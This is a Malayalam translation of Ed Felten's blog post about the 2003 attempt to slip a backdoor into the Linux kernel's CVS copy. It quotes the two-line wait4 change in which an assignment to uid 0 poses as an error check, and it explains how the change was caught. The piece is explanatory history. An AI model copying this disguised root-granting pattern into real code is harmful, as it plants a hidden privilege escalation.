ലിനക്സിലേക്കുള്ള 2003 ലെ പിന്‍വാതില്‍ ശ്രമം

ഡെബിയന്‍ ഗ്നൂ ലിനക്സില്‍ 2006 ല്‍ പ്രത്യക്ഷപ്പെട്ട ഒരു ഗൌരവകരമായ സുരക്ഷ bug നെക്കുറിച്ചും അത് NSA കയറ്റിയ ഒരു പിന്‍വാതിലാണോ എന്നതിനെക്കുറിച്ചും (അത് മിക്കവാറും അങ്ങനെയല്ല എന്നാണ് ഉപസംഹരിച്ചത്) Josh അടുത്ത കാലത്ത് എഴുതി.

ഇന്ന് മറ്റൊരു സംഭവത്തെക്കുറിച്ച് എഴുതാനാഗ്രഹിക്കുന്നു. 2003 ല്‍ ആരോ ലിനക്സ് കേണലില്‍ ഒരു പിന്‍വാതില്‍ സ്ഥാപിക്കാനായി ശ്രമിച്ചു. ഇത് തീര്‍ച്ചയായും ഒരു പിന്‍വാതില്‍ സ്ഥാപിക്കാനുള്ള ശ്രമമായിരുന്നു. എന്നാല്‍ ആരാണ് ആ ശ്രമം നടത്തിയത് എന്ന് നമുക്കറിയില്ല—മിക്കവാറും ഒരിക്കലും അറിയാന്‍ പോകുന്നില്ല.

ലിനക്സിന്റെ പ്രധാന സോഴ്സ്കോഡ് സൂക്ഷിക്കാനായി BitKeeper എന്ന ഒരു സംവിധാനമാണ് 2003 ല്‍ ലിനക്സ് ഉപയോഗിച്ചത്. ലിനക്സ് കോഡില്‍ മാറ്റങ്ങള്‍ വരുത്താന്‍ ഒരു ഡവലപ്പര്‍ ആഗ്രഹിച്ചാല്‍ അവര്‍ നിര്‍ദ്ദേശിക്കുന്ന മാറ്റങ്ങള്‍ അവര്‍ക്ക് സമര്‍പ്പിക്കാം. പിന്നീട് മാസ്റ്റര്‍ കോഡിലേക്ക് ആ മാറ്റം അംഗീകരിക്കണോ വേണ്ടയോ എന്നതിന്റെ ആസൂത്രിതമായ ഒരു അംഗീകരിക്കല്‍ പ്രക്രിയയിലൂടെ അത് കടന്ന് പോകുന്നു. മാസ്റ്റര്‍ കോഡിലെ ഓരോ മാറ്റവും ഒരു ചെറിയ വിശദീകരണത്തോടെയാണ് വരുന്നത്. അതിന് കിട്ടിയ അനുവാദത്തെക്കുറിച്ച് ചെറിയ ഒരു സൂചകവും അതില്‍ ഉള്‍പ്പെടുന്നു.

എന്നാല്‍ ചില ആളുകള്‍ക്ക് BitKeeper ഇഷ്ടപ്പെട്ടില്ല. അതുകൊണ്ട് developers ന് മറ്റൊരു ഡോഡ് സിസ്റ്റം ആയ CVS ഉപയോഗിച്ചും കോഡ് ലഭ്യമാക്കാനായി സ്രോതസ് കോഡിന്റെ രണ്ടാം പകര്‍പ്പ് സൂക്ഷിച്ചു. കോഡിന്റെ പ്രാഥമിക BitKeeper പകര്‍പ്പിന്റെ നേരിട്ടുള്ള പകപ്പാണ് CVS പകര്‍പ്പ്.

എന്നാല്‍ CVS പകര്‍പ്പില്‍ അംഗീകരിക്കല്‍ രേഖ സൂചിപ്പിക്കാത്ത ഒരു കോഡ് മാറ്റം ഉണ്ടായിരുന്നു എന്ന് നവംബര്‍ 5, 2003 ന് Larry McVoy ശ്രദ്ധിച്ചു. മാറ്റങ്ങള്‍ ഒരിക്കലും അംഗീകരിച്ചിരുന്നില്ല എന്ന് അന്വേഷണങ്ങള്‍ കാണിച്ചു. അതിലും വിചിത്രമായി ഈ മാറ്റം പ്രധാന BitKeeper repository യില്‍ ഇല്ലതാനും. കൂടുതല്‍ അന്വേഷണം നടത്തിയതില്‍ നിന്ന് ആരോ CVS server ല്‍ (ഇലക്ട്രോണിക്കായി) കടന്ന് കൂടി ഈ മാറ്റങ്ങള്‍ വരുത്തുകയായിരുന്നു എന്ന് കണ്ടു.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

[C പ്രോഗ്രാമിങ് അറിയാവുന്ന വായനക്കാര്‍ക്ക് ഒരു വ്യായാമം: ഈ കോഡില്‍ അസാധാരണമായി എന്താണുള്ളത്?]

ആ മാറ്റം എന്താണ് ചെയ്തത്? അവിടെയാണ് രസകരമായ കാര്യം സംഭവിച്ചത്. wait4 എന്ന Linux function ന്റെ കോഡിലാണ് മാറ്റമുണ്ടായത്. അതില്‍ താഴെ കൊടുത്തിരിക്കുന്ന രണ്ട് വരി കോഡ് കൂട്ടിച്ചേര്‍ക്കപ്പെട്ടു.

user ID പൂജ്യം ആയി സെറ്റ് ചെയ്യുന്നത് പ്രശ്നമാണ്. കാരണം അത് “root” ഉപയോക്താവിന്റെ ഐഡിയാണ്. അതുണ്ടെങ്കില്‍ പിന്നെ എന്തും ചെയ്യാം. സുരക്ഷ പൂര്‍ണ്ണമായും ഇല്ലാതാകും. ഏതൊരു പ്രോഗ്രാമാണോ wait4 വിളിക്കുന്നത് അതിന് റൂട്ട് അധികാരം കിട്ടും. ക്ലാസിക് പിന്‍വാതില്‍.

അത് വളരെ ബുദ്ധിപൂര്‍വ്വമായ ഒരു പ്രവര്‍ത്തിയാണ്. നിരുപദ്രവമായ തെറ്റ് പരിശോധനയായി അത് തോന്നും. എന്നാല്‍ ശരിക്കും അതൊരു പിന്‍വാതിലാണ്. എന്താണുള്ളതെന്ന് അംഗീകരിക്കല്‍ പ്രക്രിയക്ക് ശ്രദ്ധിക്കാനാകുന്ന സാധ്യതയെ മൊത്തം ഇല്ലാതാക്കിക്കൊണ്ട് സാധാരണയായുള്ള അംഗീകരിക്കല്‍ പ്രക്രിയക്ക് പുറത്തു നിന്ന് അത് കോഡിലേക്ക് കടന്നുകൂടി.

എന്നാല്‍ ആശ്രമം ശരിയായില്ല. കാരണം ലിനക്സ് സംഘം ശ്രദ്ധാലുക്കളായിരുന്നു. സാധാരണയായുള്ള അംഗീകരിക്കല്‍ പ്രക്രിയയിലൂടെയല്ലാതെയാണ് കോഡ് CVS സംഭരണിയില്‍ എത്തിയത് എന്ന് അവര്‍ കണ്ടെത്തി. ലിനക്സിനെ ഒന്നാമതാക്കുന്ന കാര്യം.

NSA നടത്തിയ ഒരു ഹാക്കാണോ ഇത്? ചിലപ്പോള്‍ ആകാം. എന്നാല്‍ ധാരാളം മറ്റുള്ളവര്‍ക്കും ആ ശേഷിയുണ്ട്. ഈ ആക്രമണം നടത്താനുള്ള പ്രചോദനവും ഉണ്ട്. ആരെങ്കിലും കുറ്റസമ്മതം നടത്താതെയോ, പുകവരുന്ന-തോക്ക് ആയ രേഖ പുറത്തുവരാതെയോ നാം അത് ഒരിക്കലും അറിയില്ല.

— സ്രോതസ്സ് freedom-to-tinker.com | Ed Felten | Oct 9, 2013

Nullius in verba
ആരുടേയും വാക്ക് വിശ്വസിക്കരുത്


ലാഭേച്ഛയില്ലാതെ പ്രവര്‍ത്തിക്കുന്ന ഒരു സ്വതന്ത്ര ജനകീയ മാധ്യമമാണ് നേരിടം. ഈ പ്രവര്‍ത്തനത്തില്‍ താങ്കളുടെ സഹായവും ആവശ്യമുണ്ട്. അതിനാല്‍ ഈ ജനകീയ മാധ്യമത്തിന്റെ നിലനില്‍പ്പ് ആഗ്രഹിക്കുന്ന താങ്കള്‍ കഴിയുന്ന രീതിയില്‍ പങ്കാളികളാവുക.

നേരിടം മെയില്‍ ഗ്രൂപ്പില്‍ അംഗമാകാന്‍ താങ്കളെ ക്ഷണിക്കുന്നു:

To read post in English:
in the URL, after neritam. append wordpress. and then press enter key.

neridam

ഒരു മറുപടി കൊടുക്കുക

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  മാറ്റുക )

Twitter picture

You are commenting using your Twitter account. Log Out /  മാറ്റുക )

Facebook photo

You are commenting using your Facebook account. Log Out /  മാറ്റുക )